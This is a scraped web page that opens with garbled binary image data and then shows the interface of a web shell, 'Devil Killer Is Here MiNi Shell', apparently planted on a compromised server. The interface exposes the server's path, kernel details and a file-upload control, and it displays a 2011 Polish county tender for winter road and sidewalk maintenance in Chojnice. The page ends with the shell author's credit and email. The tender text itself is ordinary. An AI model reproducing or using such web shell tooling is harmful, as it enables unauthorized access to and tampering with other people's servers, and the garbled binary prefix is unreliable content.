JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/321105-N-2011.html

<p class="kh_header"><b>Chojnice: USŁUGI ZWIĄZANE Z ZIMOWYM UTRZYMANIEM ULIC I DRÓG POWIATOWYCH NA TERENIE POWIATU CHOJNICKIEGO W OKRESIE ZIMA 2012 ROKU</b><br>
<b>Numer ogłoszenia: 321105 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chojnicki , ul. 31 Stycznia 56, 89-600 Chojnice, woj. pomorskie, tel. 052 3966533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ZWIĄZANE Z ZIMOWYM UTRZYMANIEM ULIC I DRÓG POWIATOWYCH NA TERENIE POWIATU CHOJNICKIEGO W OKRESIE ZIMA 2012 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowią usługi oznaczone tytułem:
USŁUGI ZWIĄZANE Z ZIMOWYM UTRZYMANIEM ULIC I DRÓG POWIATOWYCH TERENIE POWIATU CHOJNICKIEGO W OKRESIE ZIMA 2012 ROKU.
z podziałem na 22 części zamówienia 
Część  nr 1   -  teren obejmujący miasto Chojnice
Wynajęcie następującego sprzętu do zimowego utrzymania ulic
-Nośnik z solarką  i pługiem jednostronnym  2 x (350 km i do 200 godz. dyżuru)  szt. 2
-Nośniki (8-10 Mg) z pługami jedno lub dwustronnymi   (4x100 km)                   szt. 4
Część nr 2 -  teren obejmujący gminę  Czersk
 Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Nośnik (6-10Mg) z  piaskarką  i pługiem jednostronnym (do 250 godz i do 150 godz. dyżuru) szt.1
Część nr 3 -  teren obejmujący gminy Brusy i Czersk
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Nośnik (6-10Mg) z piaskarką  i pługiem jednostronnym (do 250 godz i do 150 godz. dyżuru) szt.1
Część nr 4 -  teren obejmujący gminy Brusy i Czersk
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
- Nośnik (6-10Mg) z piaskarką P.-1 i pługiem jednostronnym (do 250 godz i do 150 godz. dyżuru) szt.1
Część nr 5 -  teren obejmujący gminy Brusy i Czersk
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Nośnik (6-10Mg) z piaskarką  i pługiem jednostronnym (250 godz i 150 godz. dyżuru) szt.1
Część nr 6  - teren obejmujący gminy Brusy i Czersk
 Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Nośnik ( min. 16 Mg) z pługiem dwustronnym  (do 100 godz )   szt. 1
Część nr 7 - teren obejmujący gminy Brusy i Czersk
 Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Nośnik min. 120 KM  z pługiem  (do 100 godz.)        szt. 1
Część nr 8  - teren obejmujący gminy Brusy i Czersk
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Równiarka o mocy 88kW  (120 KM)    (do 100 godz.)         szt. 1
Część nr 9  - teren obejmujący gminy Brusy i Czersk
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
- Ładowarka FADROMA   lub równoważna  (do 50 godz.)         szt. 1
Część nr 10  -  teren obejmujący gminy Chojnice i Konarzyny
 Wynajęcie następującego sprzętu do zimowego utrzymania dróg  powiatowych:
-Nośnik (6-10Mg) z piaskarką  i pługiem jednostronnym (do 600 godz i do 100 godz. dyżuru) szt.1 
Część nr 11  -  teren obejmujący gminy Chojnice i Konarzyny
Wynajęcie następującego sprzętu do zimowego utrzymania dróg  powiatowych:
-Nośnik (6-10Mg) z piaskarką  i pługiem jednostronnym (do 600 godz i do 100 godz. dyżuru) szt.1
Część nr 12  -  teren obejmujący gminy Chojnice i Konarzyny
Wynajęcie następującego sprzętu do zimowego utrzymania dróg powiatowych:
-Nośnik (8-10Mg lub ciągnikiem powyżej 160 KM) z pługiem dwustronnym lub jednostronnym  (do 100 godz.)   szt. 1
Część nr 13  -  teren obejmujący gminy Chojnice i Konarzyny
Wynajęcie następującego sprzętu do zimowego utrzymania dróg powiatowych:
-Nośnik (8-10Mg lub ciągnikiem powyżej 160 KM) z pługiem dwustronnym  lub jednostronnym  (do 100 godz.)   szt. 1
Część nr 14   -  teren obejmujący gminy Chojnice i Konarzyny
Wynajęcie następującego sprzętu do zimowego utrzymania dróg powiatowych:
-Nośnik ( min. 16 Mg) z pługiem dwustronnym    (do 100 godz.)     szt. 1
Część nr 15   -  teren obejmujący gminy Chojnice i Konarzyny
 Wynajęcie następującego sprzętu do zimowego utrzymania dróg powiatowych:
-Równiarka o mocy 88kW (120 KM)  (do 100 godz.)     szt. 1
Część nr 16    -  teren obejmujący gminy Chojnice i Konarzyny
Wynajęcie następującego sprzętu do zimowego utrzymania dróg i ulic powiatowych:
-Ładowarka FADROMA  lub równoważna   (do 50 godz.)    szt. 1
Część nr 17 -  teren obejmujący gminy Brusy i Czersk
 Wynajęcie następującego sprzętu do załadunku mieszanki:
-Ładowarka  typu  CYKLOP, OSTRÓWEK , UNH , FADROMA lub równoważna
  (do 300 godz. i do 300 godz. dyżuru) szt.1 
Część nr 18 -  teren obejmujący gminy Brusy i Czersk 
Wykonanie 10% mieszanki piasku z solą w ilości 2.200,00 Mg na składowisku  Zamawiającego ładowarką będącą własnością Oferenta
-Ładowarka FADROMA  lub równoważna   (do 50 godz.)    szt. 1
Część nr 19 -  teren obejmujący gminy Chojnice i Konarzyny
Wykonanie 10% mieszanki piasku z solą w ilości 1.650,00 Mg na składowisku  Oferenta wraz z załadunkiem  na piaskarki   ładowarką będącą własnością Oferenta
Część nr 20 -  zimowe utrzymanie chodników na terenie miasta Brusy
  Likwidacja gołoledzi i odśnieżanie chodników i ścieżki pieszo-rowerowej na pow. 300.000,00 m2
Część nr 21 -  zimowe utrzymanie chodników na terenie miasta Chojnice 
Likwidacja gołoledzi i odśnieżanie chodników i ścieżki pieszo-rowerowej na pow. 900.000,00 m2
Część nr 22 -  zimowe utrzymanie chodników na terenie miasta Czersk
  Likwidacja gołoledzi i odśnieżanie chodników i ścieżki pieszo-rowerowej na pow. 450.000,00 m2

Szczegółowe określenie przedmiotu zamówienia zawarte jest w Rozdziale D - SIWZ OPIS PRZEDMIOTU ZAMÓWIENIA i Rozdziale F- SIWZ POSTANOWIENIA DO UMOWY.

Symbol Centralnej Klasyfikacji Produktów wg Wspólnego Słownika Zamówień - (podany uprzednio w ogłoszeniu o zamówieniu) CPV 
główny przedmiot :
KOD CPV:   90.62.00.00-9 Usługi odśnieżania, 90.63.00.00-2 Usługi usuwania oblodzeń.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  Dysponują lub będą dysponowali w pełni sprawnymi  narzędziami,  wyposażeniem zakładu i urządzeniami technicznymi, gwarantującymi wymaganą jakość i postęp robót tj.:
Część  nr 1   
        
-	Nośnik z solarką i pługiem jednostronnym  -  szt. 2
-	Nośniki (8-10 Mg) z pługami jedno lub dwustronnymi - szt. 4
Część nr 2 

-	Nośnik (6-10Mg) z  piaskarką  i pługiem jednostronnym - szt.1
Część nr 3 

-	Nośnik (6-10Mg) z piaskarką  i pługiem jednostronnym  - szt.1
Część nr 4 

-	Nośnik (6-10Mg) z piaskarką P.-1 i pługiem jednostronnym - szt.1
Część nr 5 

-	Nośnik (6-10Mg) z piaskarką i pługiem jednostronnym -  szt.1
Część nr 6  

-	Nośnik ( min. 16 Mg) z pługiem dwustronnym - szt. 1
Część nr 7 

-	Nośnik min. 120 KM z pługiem - szt. 1
Część nr 8  
-	Równiarka o mocy 88kW (120 KM) - szt. 1

Część nr 9  
-	Ładowarka FADROMA lub równoważna - szt. 1
Część nr 10  
      
-	Nośnik (6-10Mg) z piaskarką i pługiem jednostronnym - szt.1 
Część nr 11  
      
-	Nośnik (6-10Mg) z piaskarką i pługiem jednostronnym - szt.1
Część nr 12  
-	Nośnik (8-10Mg lub ciągnikiem powyżej 160 KM) z pługiem dwustronnym lub jednostronnym -  szt. 1
Część nr 13  
      
-	Nośnik (8-10Mg lub ciągnikiem powyżej 160 KM) z pługiem dwustronnym  lub jednostronnym  - szt. 1
Część nr 14   
        
-	Nośnik ( min. 16 Mg) z pługiem dwustronnym - szt. 1
Część nr 15   
      
-	Równiarka o mocy 88kW (120 KM) - szt. 1

Część nr 16    
        
-	Ładowarka FADROMA lub równoważna - szt. 1
Część nr 17 

-	Ładowarka typu CYKLOP, OSTRÓWEK, UNH, FADROMA lub równoważna
- szt.1 
Część nr 18 
-	Ładowarka FADROMA lub równoważna - szt. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane od wykonawcy:

Wypełniony FORMULARZ OFERTOWY - druk OFERTA -wg załącznika - Rozdział B SIWZ 
Wypełniony FORMULARZ CENOWY - osobno dla części, na którą składana jest oferta
 - wg załącznika- Rozdział. E SIWZ
Parafowane istotne postanowienia warunków umowy - dla części na którą składana jest oferta
 -wg załącznika - Rozdział. F SIWZ
Wykaz zakresu zamówienia, które wykonawca zamierza powierzyć podwykonawcom - dla części  na którą składana jest oferta  - wg załącznika nr 5 do SIWZ

Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 6 do siwz.

Zobowiązanie o współpracy jeżeli dotyczy - wg załącznika nr 7 do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla potrzeb Umowy, Siła Wyższa oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki.
4.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w
stosunku do treści oferty w zakresie zmiany terminu  realizacji przedmiotu umowy w   przypadku:
4.1. konieczności udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
4.1.1. z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od  
 zamówienia podstawowego wymagałoby podniesienia niewspółmiernie wysokich kosztów,
4.1.2. prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego.
4.2.wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania   
       terminu realizacji przedmiotu umowy,
4.3. wystąpienie siły wyższej,
4.4. skrócenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy,
4.5. sądowej waloryzacji zamówienia,
4.6. wstrzymania przez zamawiającego wykonywania prac nie wynikających z okoliczności leżących   po stronie wykonawcy.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w pkt 1-6, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.
5.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku  do treści oferty w zakresie wartości  przedmiotu umowy  w przypadku:
5.1. zmiany  stawki podatku od towarów i usług (VAT),
5.2. zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej
zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
6.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku:
6.1. wprowadzenia nowego podwykonawcy,
6.2. rezygnacji podwykonawcy,
6.3. zmiany wartości lub zakresu usług wykonywanych przez podwykonawców. Zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w  terminie 14 dni od przekazania tej umowy przez wykonawcę.
7.ZAMAWIAJĄCY dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie, której dokonano wyboru WYKONAWCY, w przypadku wystąpienia następujących okoliczności:
a.zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
b.powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
c.zmiany parametrów technicznych przyjętych,
d.gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - zamawiający dopuszcza możliwość zmiany Umowy, w szczególności gdy zmiana ta jest korzystna dla Zamawiającego,
e.zmiany rozwiązań  parametrów technicznych lub technologicznych, które jednak spełnia wymagania Siwz i ma parametry identyczne lub lepsze od tych zaproponowanych w ofercie,
f.zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia , w szczególności w przypadku konieczności realizowania umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych,
g.zmiany osób reprezentujących zamawiającego/wykonawcę w przypadku zmian organizacyjnych lub wynikłych z przyczyn losowych

8.Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.
9. Istotne dla Stron postanowienia zawiera wzór umowy, która stanowi integralną część niniejszej SIWZ.
10.Zamawiający nie zamierza zawrzeć umowy ramowej.
11.W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
12.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące
podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić w formie pisemnej, pod rygorem nieważności takiego oświadczenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chojnicach, ul.31 Stycznia 56,89- 600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 09:00, miejsce: Starostwo Powiatowe w Chojnicach, ul.31 Stycznia 56,89- 600 Chojnice,
Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com